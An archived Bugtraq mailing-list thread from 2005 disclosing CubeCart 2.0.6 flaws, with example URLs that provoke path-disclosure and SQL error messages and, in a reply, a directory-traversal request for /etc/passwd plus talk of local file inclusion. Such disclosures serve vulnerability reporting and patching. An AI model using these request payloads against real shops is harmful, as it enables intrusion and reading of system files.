lists.openwall.net   lists  /  announce  owl-users  owl-dev  john-users  john-dev  passwdqc-users  yescrypt  popa3d-users  /  oss-security  kernel-hardening  musl  sabotage  tlsify  passwords  /  crypt-dev  xvendor  /  Bugtraq  Full-Disclosure  linux-kernel  linux-netdev  linux-ext4  linux-hardening  linux-cve-announce  PHC 
Open Source and information security mailing list archives
 
Hash Suite: Windows password security audit tool. GUI, reports in PDF.
[<prev] [next>] [day] [month] [year] [list]
Message-ID: <200504061950.j36JoL1x002778@firebird.worldhq.net>
Date: Sun, 6 Feb 2005 20:52:00 -0000
From: "John Cobb" <johnc@...ytes.com>
To: "'Ravish Ahuja'" <ravish@...next.com>,
	<bugtraq@...urityfocus.com>
Subject: RE: [NOBYTES.COM: #6] CubeCart 2.0.6 - Information Disclosure


Hi Ravish,

This only happens on older versions, it was fixed in 2.0.5. (see
[NOBYTES.COM: #2] CubeCart 2.0.4 - Multiple Vulnerabilities)
The only other thing an attacker could do is to include a .php file
somewhere else on the server.
For example, if the attacker also had his/her website on that same server
and knew the full path to it, they could use file inclusion to launch an
'evil' .php file from there home folder.

Regards

John


www.NoBytes.com
 
Web Design, Web Hosting, Hardware, Software, You Name it, if its to do with
IT we can sort it.
 

-----Original Message-----
From: Ravish Ahuja [mailto:ravish@...next.com] 
Sent: 06 April 2005 20:44
To: 'John Cobb'; bugtraq@...urityfocus.com
Subject: RE: [NOBYTES.COM: #6] CubeCart 2.0.6 - Information Disclosure

Hello,

http://www.victimsite.com/index.php?&language=f00bar.php

Warning: Failed opening '/var/www/html/admin/lang/f00bar.php' for inclusion
(include_path='.:/usr/share/pear') in /var/www/html/admin/settings.inc.php
on line 147

This is path disclosure but it can also be used for malicious file include.

http://www.victimsite.com/index.php?language=../../../../../etc/passwd

Regards,
Ravish
http://www.xeonext.com


-----Original Message-----
From: John Cobb [mailto:johnc@...ytes.com]
Sent: Sunday, February 06, 2005 11:09 PM
To: bugtraq@...urityfocus.com
Subject: [NOBYTES.COM: #6] CubeCart 2.0.6 - Information Disclosure

Hello All,

I have discovered a number of remote vulnerabilities in: CubeCart 2.0.6.

Authors Site: http://www.cubecart.com

CubeCart is described by its authors as:

'What is CubeCart?

CubeCart is an eCommerce script written with PHP & MySQL. With CubeCart you
can setup a powerful online store as long as you have hosting supporting PHP
and one MySQL database.'

+-[Examples:]--------------------------------------------------+



[1]------------------------------------------------------------+

http://www.victimsite.com/index.php?&language=f00bar.php

Warning: Failed opening '/var/www/html/admin/lang/f00bar.php' for inclusion
(include_path='.:/usr/share/pear') in /var/www/html/admin/settings.inc.php
on line 147

[2]------------------------------------------------------------+

http://www.victimsite.com/index.php?&PHPSESSID='

Warning: Failed to write session data (files). Please verify that the
current setting of session.save_path is correct (/tmp) in Unknown on line 0

[3]------------------------------------------------------------+

http://www.victimsite.com/tellafriend.php?&product='

Warning: mysql_fetch_array(): supplied argument is not a valid MySQL result
resource in /var/www/html/tellafriend.php on line 46

[4]------------------------------------------------------------+

http://www.victimsite.com/view_cart.php?add='

Warning: mysql_fetch_array(): supplied argument is not a valid MySQL result
resource in /var/www/html/view_cart.php on line 49

[5]------------------------------------------------------------+

http://www.victimsite.com/view_product.php?product='

Warning: mysql_num_rows(): supplied argument is not a valid MySQL result
resource in /var/www/html/view_product.php on line 53

Warning: mysql_fetch_array(): supplied argument is not a valid MySQL result
resource in /var/www/html/view_product.php on line 63

Warning: mysql_num_rows(): supplied argument is not a valid MySQL result
resource in /var/www/html/view_product.php on line 144

+-[Notes:]-----------------------------------------------------+

Vulnerabilities found on: 05/03/2005
Author(s) Informed on: 05/03/2005
Author(s) Response: 05/03/2005
Author(s) Fix: 05/04/2005

 

Regards

John Cobb

JohnC@...ytes.com

http://www.NoBytes.com









Powered by blists - more mailing lists

Powered by Openwall GNU/*/Linux Powered by OpenVZ